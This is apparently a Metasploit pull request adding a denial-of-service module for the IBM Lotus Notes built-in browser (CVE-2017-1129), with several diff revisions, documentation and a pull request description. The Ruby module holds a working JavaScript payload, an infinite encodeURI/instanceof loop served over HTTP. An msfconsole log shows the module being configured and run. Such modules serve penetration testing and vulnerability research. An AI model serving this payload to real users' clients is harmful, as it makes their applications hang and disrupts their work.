### PR TITLE
IBM Lotus Notes DoS (CVE-2017-1129)

### DIFF
--- a/documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md
+++ b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md
@@ -1,16 +1,30 @@
 ## Vulnerable Application
 
-This module exploits a vulnerability in, inbuilt web-browser of IBM lotus notes, the code uses java-script based URI encoding,
-and create a object instance of encode URI due to the infinite loop it leads to Denial of Service.
+This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
 
-## Working of Module
+JavaScript is used to create an object instance of encode URI within an infinite loop,
+leading to a Denial of Service of the IBM Lotus Notes app itself.
+
+Vulnerable app versions include:
+* IBM Notes 9.0.1 to 9.0.1 FP8IF1
+* IBM Notes 9.0 to 9.0 IF4.
+* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
+* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
+* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
+* IBM Notes 8.5 release
+
+Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
+
+## Verification
 
 1. Start msfconsole
-2. `use auxiliary/dos/http/ibm_lotus_notes.rb`
-3. Set `SRVHOST`
-4. Set `SRVPORT`
-5. run (Server started)
-6. Visit server URL in web-browser of IBM
+1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
+1. Set `SRVHOST`
+1. Set `SRVPORT`
+1. run (Server started)
+1. Visit server URL in the built-in web-browser of IBM Notes client application
+
+## Scenarios
 
 ```
 msf > use auxiliary/dos/http/ibm_lotus_notes 
@@ -46,4 +60,4 @@ msf auxiliary(ibm_lotus_notes) >
 msf auxiliary(ibm_lotus_notes) > 
 ```
 
-Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
+At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value.  And then they should see their Notes app become unresponsive.

--- a/documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md
+++ b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md
@@ -1,0 +1,49 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in, inbuilt web-browser of IBM lotus notes, the code uses java-script based URI encoding,
+and create a object instance of encode URI due to the infinite loop it leads to Denial of Service.
+
+## Working of Module
+
+1. Start msfconsole
+2. `use auxiliary/dos/http/ibm_lotus_notes.rb`
+3. Set `SRVHOST`
+4. Set `SRVPORT`
+5. run (Server started)
+6. Visit server URL in web-browser of IBM
+
+```
+msf > use auxiliary/dos/http/ibm_lotus_notes 
+msf auxiliary(ibm_lotus_notes) > show options 
+
+Module options (auxiliary/dos/http/ibm_lotus_notes):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   WebServer  
+
+
+msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
+SRVHOST => 192.168.0.50
+msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
+SRVPORT => 9092
+msf auxiliary(ibm_lotus_notes) > run
+[*] Auxiliary module execution completed
+msf auxiliary(ibm_lotus_notes) > 
+[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
+[*] Server started.
+msf auxiliary(ibm_lotus_notes) > 
+```
+
+Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385

--- a/modules/auxiliary/dos/http/ibm_lotus_notes.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes.rb
@@ -14,7 +14,6 @@ class MetasploitModule < Msf::Auxiliary
         'Description'    => %q(
           This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
           If successful,it could cause the Notes client to hang and have to be restarted.
-		  http://www-01.ibm.com/support/docview.wss?uid=swg21999385
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -24,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           [ 'EXPLOIT-DB', '42602'],
           [ 'CVE', '2017-1129' ]
         ],
-        'DisclosureDate' => "August 31 2017",
+        'DisclosureDate' => 'Aug 31 2017',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'
@@ -57,4 +56,3 @@ while (true) try {
     send_response(cli, @html)
   end
 end
-

--- a/modules/auxiliary/dos/http/ibm_lotus_notes.rb
+++ b/modules/auxiliary/dos/http/ibm_lotus_notes.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
         'Name'           => "IBM Notes encodeURI DOS",
         'Description'    => %q(
           This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
-          If successful,it could cause the Notes client to hang and have to be restarted.
+          If successful, it could cause the Notes client to hang and have to be restarted.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'References'     => [
           [ 'EXPLOIT-DB', '42602'],
-          [ 'CVE', '2017-1129' ]
+          [ 'CVE', '2017-1129' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
         ],
         'DisclosureDate' => 'Aug 31 2017',
         'Actions'        => [[ 'WebServer' ]],

--- a/modules/auxiliary/dos/ibm_lotus_notes.rb
+++ b/modules/auxiliary/dos/ibm_lotus_notes.rb
@@ -1,0 +1,37 @@
+
+          [ 'EXPLOIT-DB', '42602'],
+          [ 'CVE', '2017-1129' ]
+        ],
+        'DisclosureDate' => "August 31 2017",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = %|
+    <html><head><title>DOS</title>
+<script type="text/javascript">
+while (true) try {
+                var object = { };
+                function d(d0) {
+                        var d0 = (object instanceof encodeURI)('foo');
+                }
+                d(75);
+        } catch (d) { }
+</script>
+</head></html>
+    |
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    send_response(cli, @html)
+  end
+end

--- a/modules/auxiliary/dos/ibm_lotus_notes.rb
+++ b/modules/auxiliary/dos/ibm_lotus_notes.rb
@@ -1,4 +1,26 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
 
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "IBM Notes encodeURI DOS",
+        'Description'    => %q(
+          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
+          If successful,it could cause the Notes client to hang and have to be restarted.
+		  http://www-01.ibm.com/support/docview.wss?uid=swg21999385
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra',
+        ],
+        'References'     => [
           [ 'EXPLOIT-DB', '42602'],
           [ 'CVE', '2017-1129' ]
         ],
@@ -35,3 +57,4 @@ while (true) try {
     send_response(cli, @html)
   end
 end
+


### PR DESCRIPTION
This module will exploit a vulnerability (CVE-2017-1129) found in some versions of IBM Lotus Notes client, making the application unresponsive and no longer usable.

## Verification

- [x] Start `msfconsole`
- [x] `use use auxiliary/dos/http/ibm_lotus_notes`
- [x] `set SRVHOST <IP of MSF system to act as server>`
- [x] `set SRVPORT <port of MSF system to act as server>`
- [x] `run`
- [x] in target system's Notes client browser, navigate to the URL given in the output of the previous command
- [x] **Verify** the Notes client browser becomes unresponsive, making it unusuable
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

-----

Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21999385